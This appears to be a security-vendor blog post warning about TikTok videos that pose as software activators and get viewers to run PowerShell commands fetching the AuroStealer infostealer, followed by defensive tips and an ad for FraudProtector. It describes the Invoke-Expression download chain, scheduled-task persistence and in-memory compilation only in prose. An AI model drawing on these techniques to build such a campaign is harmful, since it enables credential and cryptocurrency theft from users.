Cyber threat infographic: TikTok video icon with PowerShell command arrows leading to malware icons (AuroStealer, crypto theft); protective shields for antivirus and MFA, with "Don't Run Unknown Commands" warning banner over a social media feed.

Attackers exploit TikTok's popularity with videos posing as free Photoshop activators, tricking users into running PowerShell commands that fetch AuroStealer malware for credential theft and crypto wallet draining. The commands use Invoke-Expression to execute scripts from malicious hosts, blending with ClickFix tactics for social engineering.

Cyber threat infographic: TikTok video icon with PowerShell command arrows leading to malware icons (AuroStealer, crypto theft); protective shields for antivirus and MFA, with "Don't Run Unknown Commands" warning banner over a social media feed.Cyber threat infographic: TikTok video icon with PowerShell command arrows leading to malware icons (AuroStealer, crypto theft); protective shields for antivirus and MFA, with "Don't Run Unknown Commands" warning banner over a social media feed.

The malware persists via scheduled tasks mimicking legitimate updates, then self-compiles code in memory using .NET compiler, avoiding disk writes and detection. Similar videos target "Activate Office" or "Unlock Windows," expanding the campaign's reach.

Cyber threat infographic: TikTok video icon with PowerShell command arrows leading to malware icons (AuroStealer, crypto theft); protective shields for antivirus and MFA, with "Don't Run Unknown Commands" warning banner over a social media feed.Cyber threat infographic: TikTok video icon with PowerShell command arrows leading to malware icons (AuroStealer, crypto theft); protective shields for antivirus and MFA, with "Don't Run Unknown Commands" warning banner over a social media feed.

Defend against this:

Avoid running commands from unverified sources, use antivirus with behavioral analysis, and enable MFA. TikTok and other platforms should alert users to dangerous instructions to prevent these evolving threats.


NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, FraudProtector.net